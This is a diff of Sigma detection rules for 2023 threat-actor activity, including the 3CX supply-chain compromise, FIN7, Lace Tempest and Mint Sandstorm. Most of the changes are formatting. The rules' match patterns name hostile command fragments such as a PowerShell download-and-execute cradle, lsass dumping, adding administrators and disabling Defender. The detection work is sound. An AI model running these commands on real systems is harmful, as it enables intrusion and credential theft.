ffmpeg.dll - SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952 - SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30 - MD5=11BC82A9BD8297BD0823BCE5D6202082 + # ICONIC Stealer payload - SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423 - SHA1=3B3E778B647371262120A523EB873C20BB82BEAF - MD5=7FAEA2B01796B80D180399040BB69835 selection_hashes_2: - - sha256: - - 7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896 - - 11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03 - - F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952 - - 8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423 - - sha1: - - BF939C9C261D27EE7BB92325CC588624FCA75429 - - 20D554A80D759C50D6537DD7097FED84DD258B3E - - 894E7D4FFD764BB458809C7F0643694B036EAD30 - - 3B3E778B647371262120A523EB873C20BB82BEAF - - md5: - - 74BC2D0B6680FAA1A5A76B27E5479CBC - - 82187AD3F0C6C225E2FBA0C867280CC9 - - 11BC82A9BD8297BD0823BCE5D6202082 - - 7FAEA2B01796B80D180399040BB69835 + - sha256: + - 7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896 + - 11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03 + - F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952 + - 8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423 + - sha1: + - BF939C9C261D27EE7BB92325CC588624FCA75429 + - 20D554A80D759C50D6537DD7097FED84DD258B3E + - 894E7D4FFD764BB458809C7F0643694B036EAD30 + - 3B3E778B647371262120A523EB873C20BB82BEAF + - md5: + - 74BC2D0B6680FAA1A5A76B27E5479CBC + - 82187AD3F0C6C225E2FBA0C867280CC9 + - 11BC82A9BD8297BD0823BCE5D6202082 + - 7FAEA2B01796B80D180399040BB69835 condition: image_load and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml index 039bbb003..17a4bb27e 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/net_connection_win_malware_3cx_compromise_beaconing_activity.yml @@ -1,23 +1,22 @@ title: Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon id: 51eecf75-d069-43c7-9ea2-63f75499edd4 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp - compromise +description: Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise references: - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml index 2cb55f27b..5ade1bba8 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml @@ -1,20 +1,20 @@ title: Potential Compromised 3CXDesktopApp Execution id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental description: Detects execution of known compromised version of 3CXDesktopApp references: @@ -37,6 +37,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_hashes_1: Hashes|contains: + # 3CX Desktop 18.12.407 - SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC - SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 - SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE @@ -46,6 +47,7 @@ detection: - MD5=BB915073385DD16A846DFA318AFA3C19 - MD5=08D79E1FFFA244CC0DC61F7D2036ACA9 - MD5=4965EDF659753E3C05D800C6C8A23A7A + # 3CX Desktop 18.12.416 - SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 - SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 - SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 @@ -55,6 +57,7 @@ detection: - MD5=9833A4779B69B38E3E51F04E395674C6 - MD5=704DB9184700481A56E5100FB56496CE - MD5=8EE6802F085F7A9DF7E0303E65722DC0 + # 3CXDesktopApp MSI - SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 - SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 - SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA @@ -62,37 +65,37 @@ detection: - MD5=F3D4144860CA10BA60F7EF4D176CC736 - MD5=0EEB1C0133EB4D571178B2D9D14CE3E9 selection_hashes_2: - - sha256: - - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC - - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 - - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE - - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 - - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 - - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 - - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 - - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 - - sha1: - - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 - - 3B43A5D8B83C637D00D769660D01333E88F5A187 - - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA - - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 - - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB - - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 - - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA - - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E - - md5: - - BB915073385DD16A846DFA318AFA3C19 - - 08D79E1FFFA244CC0DC61F7D2036ACA9 - - 4965EDF659753E3C05D800C6C8A23A7A - - 9833A4779B69B38E3E51F04E395674C6 - - 704DB9184700481A56E5100FB56496CE - - 8EE6802F085F7A9DF7E0303E65722DC0 - - F3D4144860CA10BA60F7EF4D176CC736 - - 0EEB1C0133EB4D571178B2D9D14CE3E9 + - sha256: + - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC + - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02 + - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE + - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405 + - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734 + - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203 + - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868 + - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983 + - sha1: + - 480DC408EF50BE69EBCF84B95750F7E93A8A1859 + - 3B43A5D8B83C637D00D769660D01333E88F5A187 + - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA + - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1 + - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB + - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5 + - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA + - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E + - md5: + - BB915073385DD16A846DFA318AFA3C19 + - 08D79E1FFFA244CC0DC61F7D2036ACA9 + - 4965EDF659753E3C05D800C6C8A23A7A + - 9833A4779B69B38E3E51F04E395674C6 + - 704DB9184700481A56E5100FB56496CE + - 8EE6802F085F7A9DF7E0303E65722DC0 + - F3D4144860CA10BA60F7EF4D176CC736 + - 0EEB1C0133EB4D571178B2D9D14CE3E9 selection_pe_1: - - OriginalFileName: 3CXDesktopApp.exe - - Image|endswith: \3CXDesktopApp.exe - - Product: 3CX Desktop App + - OriginalFileName: 3CXDesktopApp.exe + - Image|endswith: \3CXDesktopApp.exe + - Product: 3CX Desktop App selection_pe_2: FileVersion|contains: 18.12. condition: process_creation and (all of selection_pe_* or 1 of selection_hashes_*) diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml index e82fb7914..95fb7aba6 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml @@ -1,23 +1,22 @@ title: Potential Suspicious Child Process Of 3CXDesktopApp id: 63f3605b-979f-48c2-b7cc-7f90523fed88 related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects potential suspicious child processes of "3CXDesktopApp.exe". - Which could be related to the 3CXDesktopApp supply chain compromise +description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise references: - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/ - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/ diff --git a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml index aadbea068..ce9cdd410 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml @@ -1,23 +1,22 @@ title: Potential Compromised 3CXDesktopApp Update Activity id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a related: - - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 - type: similar - - id: 76bc1601-9546-4b75-9419-06e0e8d10651 - type: similar - - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 - type: similar - - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 - type: similar - - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c - type: similar - - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 - type: similar - - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 - type: similar + - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2 + type: similar + - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH + type: similar + - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2 + type: similar + - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2 + type: similar + - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec + type: similar + - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc + type: similar + - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad + type: similar status: experimental -description: Detects the 3CXDesktopApp updater downloading a known compromised version - of the 3CXDesktopApp software +description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software references: - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/ - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats @@ -38,7 +37,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \3CXDesktopApp\app\update.exe - CommandLine|contains|all: + CommandLine|contains|all: - --update - http - /electron/update/win32/18.12 diff --git a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml index 0725bc002..b1bc1a150 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/dns_query_win_apt_diamond_steel_indicators.yml @@ -25,7 +25,6 @@ detection: - olidhealth.com condition: dns_query and selection falsepositives: - - Might generate some false positive if triggered by a user during investigation - for example. + - Might generate some false positive if triggered by a user during investigation for example. level: high ruletype: Sigma diff --git a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml index cccce5bbc..378ba552b 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/proc_creation_win_apt_diamond_sleet_indicators.yml @@ -1,8 +1,7 @@ title: Diamond Sleet APT Process Activity Indicators id: b5495d8d-24ad-4a44-8caf-ceae9a07a5c2 status: experimental -description: Detects process creation activity indicators related to Diamond Sleet - APT +description: Detects process creation activity indicators related to Diamond Sleet APT references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' uTYNkfKxHiZrx3KJ' + CommandLine|contains: ' uTYNkfKxHiZrx3KJ' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml index e33ac9cac..dd7748d2c 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Diamond-Sleet/registry_event_apt_diamond_sleet_scheduled_task.yml @@ -1,10 +1,8 @@ title: Diamond Sleet APT Scheduled Task Creation - Registry id: 9f9f92ba-5300-43a4-b435-87d1ee571688 status: experimental -description: 'Detects registry event related to the creation of a scheduled task used - by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability - - ' +description: | + Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability references: - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml b/sigma/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml index d9602f0a5..366f5d8ef 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/FIN7/file_event_win_apt_fin7_powershell_scripts_naming_convention.yml @@ -1,8 +1,7 @@ title: Potential APT FIN7 Related PowerShell Script Created id: a88d9f45-ec8a-4b0e-85ee-c9f6a65e9128 status: experimental -description: Detects PowerShell script file creation with specific name or suffix - which was seen being used often by FIN7 PowerShell scripts +description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Nasreddine Bencherchali (Nextron Systems) @@ -20,8 +19,8 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|endswith: _64refl.ps1 - - TargetFilename: host_ip.ps1 + - TargetFilename|endswith: _64refl.ps1 + - TargetFilename: host_ip.ps1 condition: file_event and selection falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml b/sigma/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml index 7b688b00d..8472cc1ad 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/FIN7/proc_creation_win_apt_fin7_powertrash_lateral_movement.yml @@ -1,8 +1,7 @@ title: Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity id: 911389c7-5ae3-43ea-bab3-a947ebdeb85e status: experimental -description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs - for reconnaissance and POWERTRASH execution +description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers - https://labs.withsecure.com/publications/fin7-target-veeam-servers/jcr:content/root/responsivegrid/responsivegrid/responsivegrid/image_253944286.img.png/1682500394900.png @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - -noni -nop -exe bypass -f \\\\ - ADMIN$ selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - -ex bypass -noprof -nolog -nonint -f - C:\Windows\Temp\ condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml index ae30a024c..a94681333 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/file_event_win_apt_lace_tempest_indicators.yml @@ -1,8 +1,7 @@ title: Lace Tempest File Indicators id: e94486ea-2650-4548-bf25-88cbd0bb32d7 status: experimental -description: Detects PowerShell script file creation with specific names or suffixes - which was seen being used often in PowerShell scripts by FIN7 +description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7 references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|endswith: - - :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe - - :\Program Files\SysAidServer\tomcat\webapps\usersfiles.war - - :\Program Files\SysAidServer\tomcat\webapps\leave - - TargetFilename|contains: :\Program Files\SysAidServer\tomcat\webapps\user. + - TargetFilename|endswith: + - :\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exe + - :\Program Files\SysAidServer\tomcat\webapps\usersfiles.war + - :\Program Files\SysAidServer\tomcat\webapps\leave + - TargetFilename|contains: :\Program Files\SysAidServer\tomcat\webapps\user. condition: file_event and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml index 2b991f6d0..6dcef6474 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_cobalt_strike_download.yml @@ -1,8 +1,7 @@ title: Lace Tempest Cobalt Strike Download id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d status: experimental -description: Detects specific command line execution used by Lace Tempest to download - Cobalt Strike as reported by SysAid Team +description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring( - /a') condition: process_creation and selection diff --git a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml index e6ec56c66..a08f7a7c4 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Lace-Tempest/proc_creation_win_apt_lace_tempest_loader_execution.yml @@ -1,8 +1,7 @@ title: Lace Tempest Malware Loader Execution id: 745ea50b-9673-4ba7-9426-cb45cf4a8e6d status: experimental -description: Detects execution of a specific binary based on filename and hash used - by Lace Tempest to load additional malware as reported by SysAid Team +description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team references: - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml b/sigma/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml index 742449875..44d95d919 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Lazarus/image_load_apt_lazarus_side_load_activity.yml @@ -1,8 +1,7 @@ title: Lazarus APT DLL Sideloading Activity id: 24007168-a26b-4049-90d0-ce138e13a5cf status: experimental -description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in - the case of a Spanish aerospace company +description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company references: - https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/ - https://www.bleepingcomputer.com/news/security/lazarus-hackers-breach-aerospace-firm-with-new-lightlesscan-malware/ diff --git a/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml b/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml index d00643ea5..6c84f7ba3 100644 --- a/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml +++ b/sigma/sysmon/emerging-threats/2023/TA/Mint-Sandstorm/proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml @@ -27,95 +27,94 @@ detection: - \powershell.exe - \powershell_ise.exe selection_special_child_powershell_cli: - - CommandLine|contains: - - ' echo ' - - -dumpmode - - -ssh - - .dmp - - add-MpPreference - - adscredentials - - bitsadmin - - certutil - - csvhost.exe - - DownloadFile - - DownloadString - - dsquery - - ekern.exe - - FromBase64String - - 'iex ' - - iex( - - Invoke-Expression - - Invoke-WebRequest - - localgroup administrators - - net group - - net user - - o365accountconfiguration - - query session - - samaccountname= - - set-MpPreference - - svhost.exe - - System.IO.Compression - - System.IO.MemoryStream - - usoprivate - - usoshared - - whoami - - CommandLine|re: "[-/\u2013][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" + - CommandLine|contains: + - ' echo ' + - -dumpmode + - -ssh + - .dmp + - add-MpPreference + - adscredentials + - bitsadmin + - certutil + - csvhost.exe + - DownloadFile + - DownloadString + - dsquery + - ekern.exe + - FromBase64String + - 'iex ' + - iex( + - Invoke-Expression + - Invoke-WebRequest + - localgroup administrators + - net group + - net user + - o365accountconfiguration + - query session + - samaccountname= + - set-MpPreference + - svhost.exe + - System.IO.Compression + - System.IO.MemoryStream + - usoprivate + - usoshared + - whoami + - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}' selection_special_child_lsass_1: - CommandLine|contains: lsass + CommandLine|contains: lsass selection_special_child_lsass_2: - CommandLine|contains: + CommandLine|contains: - procdump - tasklist - findstr selection_child_wget: Image|endswith: \wget.exe - CommandLine|contains: http + CommandLine|contains: http selection_child_curl: Image|endswith: \curl.exe - CommandLine|contains: http + CommandLine|contains: http selection_child_script: - CommandLine|contains: + CommandLine|contains: - E:jscript - e:vbscript selection_child_localgroup: - CommandLine|contains|all: + CommandLine|contains|all: - localgroup Administrators - /add selection_child_net: - CommandLine|contains: net - CommandLine|contains|all: + CommandLine|contains: net # Covers net1 + CommandLine|contains|all: - user - /add selection_child_reg: - - CommandLine|contains|all: - - reg add - - DisableAntiSpyware - - \Microsoft\Windows Defender - - CommandLine|contains|all: - - reg add - - 